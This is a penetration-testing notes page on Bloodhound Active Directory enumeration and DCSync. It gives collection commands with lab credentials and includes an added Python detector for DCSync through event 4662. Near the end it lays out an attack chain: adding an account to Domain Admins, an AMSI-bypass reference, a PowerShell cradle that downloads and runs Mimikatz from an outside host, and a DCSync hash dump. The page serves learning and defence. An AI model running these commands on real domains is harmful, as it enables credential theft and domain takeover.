# Bloodhound

## Overview

**Bloodhound** works the same way as [ldapdomaindump](/active-directory/post-compromise-enumeration/ldapdomaindump.md), but it also collects data using Kerberos tickets and SMB sessions.

Bloodhound allows for better visualization of attack paths, misconfigurations, and potential privilege escalation paths.

<figure><img src="/files/Ev6bEn7FAHrsg8ma9jNQ" alt=""><figcaption></figcaption></figure>

## Domain Enumeration

```bash
sudo neo4j console
```

```bash
sudo bloodhound
sudo bloodhound-python -d PNPT.local -u greg -p 'Password1' -ns 192.168.1.129 -c all
```

Upload the dumped files into the **Bloodhound** GUI.

## Sharphound

If you don't have valid AD credentials and only have a shell on a domain-joined host, you can run **SharpHound.exe** to collect the data.

{% hint style="danger" %}
This is very noisy, so it should only be run if you don't mind the noise.
{% endhint %}

```
SharpHound.exe -c All
```

## Methodology

* Mark all pwned machines
* Check **Reachable High Value Targets**
  * Essentially checks whether that one machine could compromise the entire domain
* Check **Inbound Control Rights**
  * Which accounts/groups can control this object
* Check **Outbound Control Rights (First Degree Object Control)**
  * Which objects our compromised machine can control

## DCSync/GetChangesAll

<figure><img src="/files/5RX9b59KdlDDkUNWRhdg" alt=""><figcaption></figcaption></figure>

If you have the GetChanges and GetChangesAll privileges, you can perform a DCSync attack. The attack abuses directory replication: domain controllers replicate account data between each other so that they all hold the most up-to-date copy, and any principal holding these two rights can request that replication too. This means we can extract all of the NTLM hashes by requesting a DCSync from the domain controller.
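The same replication mechanism that makes DCSync possible also makes it detectable: a replication request is logged on the domain controller as Security event 4662 whose `Properties` field carries the control-access-right GUID that was exercised. The following script is an added example, not part of the original page or of Bloodhound, that runs that check over a few constructed event records. The two GUIDs are the real Active Directory control-access rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; the newline-delimited JSON export format, the account names, and the allow-list of domain controller computer accounts (`DC01$`, `DC02$`) are assumptions for the demonstration.

```python
"""
Detect DCSync-style replication requests from Windows Security event 4662 records.

Constructed sample records (not real logs) mimic the fields an event-log
pipeline would export. A real 4662 event records the accessed control-access
right as a GUID inside the Properties field.
"""
import json

# Control-access right GUIDs for the two replication rights named in the text.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# ADS_RIGHT_DS_CONTROL_ACCESS: the access mask bit for control-access rights.
CONTROL_ACCESS_MASK = 0x100

# Assumed allow-list (placeholder names): domain controller computer accounts
# replicate legitimately, so only other subjects are worth alerting on.
EXPECTED_REPLICATORS = {"DC01$", "DC02$"}

# Constructed sample events, one JSON object per line: a normal DC-to-DC
# replication, a replication request by a regular user, an unrelated 4662,
# and a logon event that should be ignored entirely.
SAMPLE_EVENTS = """\
{"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "PNPT", "ObjectType": "domainDNS", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "AccessMask": "0x100"}
{"EventID": 4662, "SubjectUserName": "itmanager", "SubjectDomainName": "PNPT", "ObjectType": "domainDNS", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "AccessMask": "0x100"}
{"EventID": 4662, "SubjectUserName": "greg", "SubjectDomainName": "PNPT", "ObjectType": "user", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x100"}
{"EventID": 4624, "SubjectUserName": "greg", "SubjectDomainName": "PNPT", "LogonType": 3}
"""


def parse_events(text):
    """Parse newline-delimited JSON into a list of event dicts, skipping blanks."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def requested_replication_rights(event):
    """Return the set of replication-right GUIDs present in the event's Properties."""
    props = event.get("Properties", "").lower()
    return {guid for guid in REPLICATION_GUIDS if guid in props}


def is_suspicious_dcsync(event, expected=EXPECTED_REPLICATORS):
    """True when a non-allow-listed subject exercised a replication right."""
    if event.get("EventID") != 4662:
        return False
    # Control-access rights are reported with the 0x100 bit in AccessMask.
    mask = int(event.get("AccessMask", "0x0"), 16)
    if not mask & CONTROL_ACCESS_MASK:
        return False
    if not requested_replication_rights(event):
        return False
    return event.get("SubjectUserName") not in expected


def find_dcsync_candidates(text, expected=EXPECTED_REPLICATORS):
    """Run the detection over an NDJSON export and return the flagged events."""
    return [e for e in parse_events(text) if is_suspicious_dcsync(e, expected)]


if __name__ == "__main__":
    for hit in find_dcsync_candidates(SAMPLE_EVENTS):
        print("DCSync candidate:", hit["SubjectDomainName"] + "\\" + hit["SubjectUserName"],
              sorted(requested_replication_rights(hit)))
```

In a real deployment the allow-list should be built from the domain's actual DC computer accounts (and any directory-sync service account), since those are the only subjects expected to hold both rights; everything else exercising them is a high-fidelity signal.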

Add your account to the Domain Admins group (the example uses the `itmanager` account):

```
net group "Domain Admins" itmanager /add /domain
```

Perform an [AMSI bypass](/post-exploitation/av-evasion/bypassing-amsi.md), then load Mimikatz:

```
IEX(New-Object Net.WebClient).downloadString('http://10.9.254.6/mimikatz.ps1')
```

Grab the Domain Administrator hash with a DCSync:

```
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:conda.local /user:Administrator"'
```

